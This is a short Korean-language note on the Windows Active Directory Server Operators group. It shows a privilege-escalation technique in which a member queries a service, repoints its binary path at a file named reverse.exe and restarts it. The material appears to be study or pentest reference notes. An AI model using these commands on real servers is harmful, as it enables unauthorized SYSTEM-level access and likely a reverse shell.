Server Operators

Server Operators 그룹은 Active Directory 환경에서만 존재하는 그룹이며, Windows 서버에 관련된 자원에 대한 접근 권한이 있습니다. 기본적으로 Administrator라고 할지라도 이 그룹의 구성원에 속하지 않고 별도로 멤버를 추가해야 하며 삭제는 불가능한 그룹입니다.

이 그룹의 구성원 권한으로 할 수 있는 권한 상승 방법 중에는 서비스 바이너리 경로 변경이 있습니다.

# 서비스 바이너리 원본 확인 후 변경
sc.exe qc TestService
sc.exe config TestService binPath="C:\Windows\Temp\reverse.exe"
Restart-Service TestService

References

Active Directory 보안 그룹MicrosoftLearn

Windows Privilege Escalation: Server Operator GroupHacking Articles